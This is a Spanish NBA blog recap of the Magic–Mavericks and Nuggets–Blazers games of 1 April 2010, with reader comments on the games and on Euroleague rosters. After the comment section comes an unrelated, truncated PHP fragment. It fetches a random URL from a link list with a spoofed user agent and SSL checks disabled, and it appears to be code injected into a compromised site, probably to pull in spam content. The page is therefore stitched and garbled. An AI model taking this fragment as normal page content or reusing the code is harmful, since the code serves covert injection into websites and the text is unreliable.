La crónica (01/04/2010)

02 de April de 2010 por telekoman

Tan sólo 2 partidos esta noche de Jueves, pero qué dos partidos.Howard masacra a Haywood

Se enfrentaban en Dallas los números 2 de ambas conferencias, en un partido que bien podría ser la Final de la NBA de este año, con permiso de Bryant  y Lebron, por supuesto. Los Mavericks aguantaron 2 cuartos escasitos a los Magic y por supuesto, gracias a la actuación de Nowitzki. Nelson, Carter y Howard bastaron en el quinteto titular de Orlando para masacrar al quinteto titular de Dallas, donde sólo el alemán pasó de 10 puntos. Y además Pietrus se salió literalmente desde el banquillo consiguiendo otros 24 puntos. Vamos que ya falta poco para que lleguen los Playoffs y Dallas se les siguen viendo carencias pese al equipazo que tienen.

Melo avanzaY en el otro partido Denver aprovechó la derrota de Dallas para convertir la lucha por la segunda plaza del Oeste en una carnicería. Utah, Dallas, Phoenix y Denver en un sólo partido a falta de 6. Va a ser memorable, que diría Barney Stinson. Centrándonos en el partido diremos que Portland no fue en rival para Denver. Llegaron al descanso prácticamente empatados gracias a un tiro final de Camby que volvía a ver a su anterior equipo, pero el tercer cuarto fue el definitivo. La noticia negativa fue la lesión de Chris Andersen que se une a la de Kenyon Martin lo que deja el juego interior de los de Colorado en cuadro-

PREMIOS

MVP: 17 puntos, 20 rebotes y 5 gorros de altura confirman a Dwight Howard como el mejor jugador de hoy. Se merendó con patatas a Haywood.

El rookie: Este lo dejamos desierto.

La sorpresa: ¿Pietrus 24 puntos? Claro que los 20 puntos entre Marion, Haywood, Butler y Kidd no se quedan atrás. Sorpresa y decepción a partes iguales.

Mayor esfuerzo en vano: Los 24 puntos de Nowitzki y de Miller no sirvieron absolutamente de nada en las derrotas de sus equipos que se complican la vida de cara a los Playoffs.

Comenta

23 comentarios a esta entrada

  1. Barney Stinson dice:
    #1

    Yo diría más bien legendario

      Citar

  2. NBA LAKERS BLOG dice:
    #2

    “Utah, Dallas, Phoenix y Denver en un sólo partido a falta de 6.” Cosas como estas denotan la supremacía de la conferencia Oeste sobre la del Este. Vaya Playoffs tendremos por ese lado.

    Te espero en nuestro blog de los Lakers!

    Un fuerte abrazo 😉

    -NM-

      Citar

  3. Love Denise dice:
    #3

    partidazo de Orlando en Dallas, muy bien Pietrus saliendo desde el banquillo para clavar un 6 de 6 en triples, buenos minutos los de Bass y por supuesto el trio Carter-Nelson-Howard dominaron por completo a sus pares.
    Sigo pensando que Dallas puede dar un susto muy grande a los Lakers, pero deben de empezar a espabilar ya, Butler muestra su calidad a ratos, al igual que Marion, y hoy tanto Kidd como Nowitzki no tuvieron un buen día, el mejor de los Mavs fue sin duda Barea, éste jugador y Beaubois (que hoy no ha hecho nada) me gustan, me parecen dos muy buenos suplentes.

      Citar

  4. Love Denise dice:
    #4

    qué os parece Ante Tomic? lo veis como el nuevo gasol? la verdad es que en la eliminatoria Madrid_barça ha sido elmejor por parte de los blancos, que han volcado todo su juego sobre las espaldas de este muchacho y de Llull (incomprensible por mi parte, con la plantilla tan amplia de la que dispone Messina), a mi me parece un muy buen jugador, con buenos movimientos cerca del aro, y con un tirito decente de 4-5 metros que con lo joven qué es irá mejorando, supongo que en 2 años estará en la NBA, aunque en EEUU jugaría sería más un 4 que un 5, por el momento está bastante flaco y es un poco blando sobre el pivot rival, pero le veo con futuro.

      Citar

  5. Txusma dice:
    #5

    Incomprensible que el Madrid haya volcado su juego en Sergio Llull? No te gusta? Yo lo veo en la NBA en un par de años también…

      Citar

  6. David dice:
    #6

    La verdad es que Tomic tiene movimientos que recuerdan mucho a Pau, y para ser el principal argumento ofensivo de todo un Madrid de Messina, ante un Barça como éste, es una buena carta de presentación.

    Y Llull, que me gustaba y tal, pero sin alardes, creo que ha dado un paso al frente esta serie. Ayer sí me demostró que realmente puede llegar a la NBA.

      Citar

  7. Love Denise dice:
    #7

    no me has entendido txusma,
    me refiero que con una plantilla como la del Madrid con jugadores como Prigioni, Lavrinovic, Kaukenas, bullock, etc… Messina se limite a jugar con 2 tíos en ataque (llull y Tomic) que eran los que siempre tiraban en lso momentos dificiles. Hay que diversificar los recursos y hacer participes a los demás jugadores, que para eso son de primer nivel. Para mí, el error es de Messina, en ningún moemnto de Llull o de Tomic que se han marcado unas series extraordinarias. tampoco entiendo por qué el italiano no le da minutos a Vidal, por ejemplo en detrimento de Hansen, por qué no juega más Velickovic,, en detrimento de Garba, y en qué estúpido criterio se basó para echar a Hervelle, que al menos le pone eggs.

      Citar

  8. Txusma dice:
    #8

    De acuerdo Love, pillado el mensaje. He leido algun post por ahi en q se disculpa un poco a Messina pq se comenta que como llegó en Junio no pudo fabricarse la plantilla a medida. En realidad echó a toda la plantilla menos a 3 y de estos a Reyes y Bullock los tiene bastante dejados de lado. A mi Reyes y Hervelle me gustaban por las narices q le ponían y eso es necesario en cualquier equipo de baloncesto. Ahora que juego más regularmente a basquet me doy cuenta que prefiero un equipo con 2 estrellas y 10 gladiadores no exentos de calidad que uno con 10 estrellas y 2 gladiadores… Veamos que movimientos hace Messina de cara al año q viene pq me da que 6 o 7 jugadores se volverána ir y así no se construye correctamente.

      Citar

  9. Love Denise dice:
    #9

    sí, nunca es bueno tener un equipo plagado de estrellas, hay más probabilidad a que haya mal ambiente y enfados entre ellos, porque o se reparten los minutos equitativamente, o unos juegan 30 y otros 10 minutos. Ya le ha pasado esto al Panathinaikos en los últimos años (por cierto, Pekovic también tiene nivel NBA), lo bueno que tiene el Barça es que tiene 12 jugadores de primer nivel, pero que parecen que tienen los pies en el suelo, y sí a veces juegan poco no se quejan, a esto también ayuda él tener jugadores de la cantera o que sientan los colores, no me imagino a Grimau, Sada o Trias protestando porque han jugado poquçisimo en esta serie.
    sobre el Madrid, creo que la culpa es exclusivamente de Messina, que no ha sacado el máximo provecho de esta gran plantilla. los años anteriores, se puteaba a Joan Plaza, que tenía que lidiar con gente como kennedy winston, Massey, quinton Hosley, Papadopoulos pepe sanchez totalmente acabado…y al italiano le forman un equipazo y no ha sido capaz de dominar sus piezas, también es cierto que si hubieran ganado al Maccabi, a priori lo hubieran tenido más facil para acceder a la Final Four, hubieran jugado en cuartos contra el Partizan. A mí del Madrid actual sólo me sobra Hansen y Bullock que empieza a estar acabado, e intentaría fichar a un pivot intimidador, no estaría mal D’or Fischer del maccabi, sería un buen remedio anti-Ndong, y Vazquez

      Citar

  10. Love Denise dice:
    #10

    también sobra Garbajosa (yo creo que está por lo de los cupos y el ser español)

      Citar

  11. LEmontus dice:
    #11

    ¿llul? puede que sí que llegue la nba por la proganda que tiene españa y eso… cuando llegue y no meta un triple y vena que solo sirva para defender pero como es normal solo podrá defender a los de siempre(arenas d-will curry jennings rondo le harán un roto), tomic creo que está claro que tiene pucho poder ofensivo buenos, moviemitenos tiros con ambas manos, buen tiro medio… pero muy flojo en defensa tanto con el pivto que le toca cubrir como con el jugador que penetra.

    No se que culpa tiene messina, si comparais equipos el madrid tiene equipo para perder por paliza contra el barsa así que bien por messina, que ha hecho lo que ha podido con una plantilla MALÍSIMA en comparación con lo que hay en europa(partizán, cska,barsa,olipiakos).

    Por último destacar que por vigésimo cuarta mil vez xD la conferencia este vuelve a dar un gope de efecto, no hay equipos en la nba que lo hayan hecho mejor que cavs o magic lo que ha hecho bajar bastante los balances de la conferencia este, el oeste no es ni mucho muy superior al este vaya tontería(la diferencia la marca houston frente a kincks). El aniño está entre magic y cavs.

      Citar

  12. Toni dice:
    #12

    Si Tomic no se va por caminos equivocos ni se precipita, puede ser un nuevo Gasol, sin duda, calidad y altura los tiene a raudales pero tiene cara de chabal aún, yo lo veia y me recordaba a aquel Gasol de la copa del rey…
    Este Tomic llegará lejos.
    Lo que me choca es que no hableis de Ricky quien se marcó un autentico partidazo, estoy de acuerdo que el partido anterior estubo desastroso pero ayer se salió.
    El de ayer fue un partidazo, yo lo he visto esta mañana en teledeporte otra vez, ¡ qué friki! TT
    De aqui un ratito en cuatro dan el Hawks-Cavs, buen partido.

      Citar

  13. kantonyo dice:
    #13

    No estoy de acuerdo en que el Madrid tenga tan mala plantilla, creo que quitando el Barcelona y el Olympiakos es la mejor de Europa. Nadie más tiene a un Velickovic, Llul, Reyes, Prigioni, Tomic, Bullock, Lavrinovic, Jaric ….
    Por cierto, Josh Childress, 22 puntos, 6 rebotes, 3 robos (28 valoración) contra el Asseco. Despues de un mal primer año se ha asentado y está siendo uno de los mejores de la euroliga. Una final Barça-Olympiakos es una pasada.

      Citar

  14. LEmontus dice:
    #14

    quitando barcelona olipiakos cska(que son mis favoritos,hoden,landon.silkauskas…) partizan(otro equipazo al que los expertos daban por muerto por perder a sus mejoes jugadores pero es que siguen teniendo un gran equipo de momento a maccabi se los han barrido veremos hasta donde puede llegar) y maccabi(aunque este año no lo he visto mucho la verdad, solo la serie contra el partizan) tienen mejor plantilla. esto hace que en españa tengan por encima al barcelona lo que les deja sin titulo de la acb salvo sorpresón porque el barsa es muy pero que muy superiror, además está el caja laboral que por equipo diría que está cerca del madrid auque sus estrellas no aporten lo que se esperaba.
    Y ya en la euroliga lo tiene imposible eso se veía desde hace tiempo

    Analizando el equipo del madrid tomic lavrniovic sí son muy buenos. Prigioni es el PEOR base que hay entre los equipos punteros(no entiendo que messina no lo haya echado vaya regalito), no aporta nada, alguna asitencia a lo sumo, Llul le habrás visto esta serie contra el barsa que ha estado bien(en el último partido más que nada, pero no es ni mucho menos un jugador que marque la diferencia ni muchísimo menos un nba), reyes es buen jugador contra un xacobeo , unicaja…. cuando se enfrenta a los interiores buenos sufre muchísimo,¿bullock? si fue el mejor en su día pero hoy apenas cuenta para messina, y jaric pufff tiene cosas de jugón pero nada en la nba demostró que es uno más.

      Citar

  15. LEmontus dice:
    #15

    Por cierto Cp3 en 37 min 16 puntos 3 perdidas 1 robo 8 asistencias 1 reb -11 en el +/-

    Dc2 en 26 min 15 puntos 1 perdida 3 robos 3 asistecias 2 rebs -8 en el +/-

    Teniendo en cuenta que cuando juegan juntos el base es cp3 otra paliza de darren. Lo que me extraña que visto lo visto no le den más minutos a darren, esto me hace pensar que paul no será traspado, lo que sería un fallo más en la largalista de errores de los GM.

      Citar

  16. Love Denise dice:
    #16

    en absoluto desacuerdo con Lemontus sobre el tema Real Madrid.
    ¿cómo osas decir que el Partizan tiene mejor plantilla que el Madrid? ¿pensabas eso en septiembre, o eres oportunista? Tiene muchisimo mérito lo del Partizan, un equipo que le quitaron a sus 4 mejores jugadores (Tepic, tripkovic, velickovic y Lasme) y ha llegado a la Final four con un equipo plagado de veinteañeros con mucho futuro, pero para nada pienso que son superiores al Madrid, de hecho creo que si se hubieran enfrentado en cuartos, los blancos se hubieran clasificado. Para mí, La plantilla merengue es la 3º mejor del continente (tras Barça y Olimpiakos ) e incluso superior a la del CSKA y Panathinaikos, sólo que messina no ha sabido sacar provecho a sus jugadores, gente como Vidal, Reyes, Bullock y Velickovic están superinfrautilizados, por no hablar del estilo racano a 60 puntos del italiano.
    Tanto Prigioni como reyes son de lo mejorcito en Europa, en total desacuerdo con lo que has dicho de ellos.

      Citar

  17. Love Denise dice:
    #17

    Ginobili y Duncan les ha hecho esta noche un traje a mis Magic. El argentino se ha ido hasta los 43 puntos, y Tim se ha marcado un 10/12 a pesar de que no ha jugado mucho. La clave también ha diso el mal día de hOward, cometiendo muchas faltas que le han impedido jugar y defender como sabe, y su horrible 2/11 en tiros libres.

      Citar

  18. kantonyo dice:
    #18

    No me ha sorprendido para nada el éxito de Partizan, si alguien ha hablado en este blog sobre ellos, he sido yo. Llevo siguiendo durante todo el año a Jan Vasely desde que empezó a aparecer en los mockdraft y te puedo asegurar que el Madrid tiene muchísimo mejor equipo que el Partizan. No le resto meritos al equipo serbio pero ha tenido “suerte” en el cruce con el Maccabi, que no es ni mucho menos el de los últimos años. El Madrid perdió sus dos partidos contra los de Telaviv, igual que el de futbol perdió contra el Lyon y no quiere decir que tengan peor plantilla, son cosas que ocurren en el deporte. Creo que el único jugador que podría estar en el Real Madrid, sería el alero Alan Anderson, los demás me temo que ni regalados.

    Con respecto al CSKA hay muchas mas dudas, tiene grandes jugadores pero su columna vertebral roza los 33 años, por eso yo me quedo con la plantilla del Real Madrid. Eso sí, veo a Olympiakos y Barcelona muy por encima del resto, aunque a partido único puede pasar cualquier cosa.

      Citar

  19. LEmontus dice:
    #19

    que el cska tiene peor equipo que el madrid? :O :O , creo que os equivocais por dios si el cska con 4 jugadores ya triplica la calidad del madrid…. yo al partizan sigo viéndole mejor equipo aunque es discutible, pero el cska tiene una platilla muy superior los considero favoritos y por tanto con opciones que el madrid no ha tenido nunca.

      Citar

  20. sergio dice:
    #20

    A mi tambien me GUSTA mas la plantilla del CSKA que la del Madrid.. especialmente porque creo que la del Madrid no esta hecha pensando en las necesidades del equipo (falta de centimetros e intimidacion). Algunos jugadores no han rendido en funcion de su caché, como Kaukenas, Bullock o Lavrinovic. El quintento del CSKA me parece que rivaliza con el del Olympiakos en cuanto a calidad. Lo del Barça lo considero diferente: entre quien entre el equipo no es peor que antes.

    Kantonyo eres un romantico… fan del Partizan. No se que seria del baloncesto europeo sin la cantera de este equipo…

      Citar

  21. Love Denise dice:
    #21

    100% de acuerdo con el último comentario de kantonyo, aunque yo creo que D’or Fischer y Bluthenthal (del maccabi) también tendrían hueco en el Madrid, que está falto de un pivot intimidador y de un 3 fuerte.
    El problema del CSKA es que sus mejores jugadores empiezan a hacerse mayor, aparte de los Holden, Siska, Langdon, …me gusta también Sasha Kaun un pivot de 7 pies con decentes fundamentos.

      Citar

  22. kantonyo dice:
    #22

    Love Denise, estoy contigo respecto a Kaun, es joven (24) y ha tenido un año por encima de lo que se esperaba de él, y puede que esté entre los jugadores más prometedores de Europa. Fue drafteado por Seatle (OKC) y ahora Cleveland tiene sus derechos.

    Por cierto has estado muy oportuno en plena Final Four nombrando a Sasha ¿sabías que Sasha Kaun era junto con Cole Aldrich el pívot suplente de la Universidad de Kansas cuando fueron campeones del 2008 de la NCAA?. Vaya parejita de interiores suplente que tenían y eso que Bill Self (coach) jugaba con un quinteto sin pívots: Chalmers (PG), R.Robinson(SG), B. Rush (SF), D. Jackson (PF) y Darrell Arthur (PF).

      Citar

  23. Love Denise dice:
    #23

    No lo sabía, muy buena información. Creo que Darrell Arthur se ha quedado muy estancado, no ha progresado mucho .

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>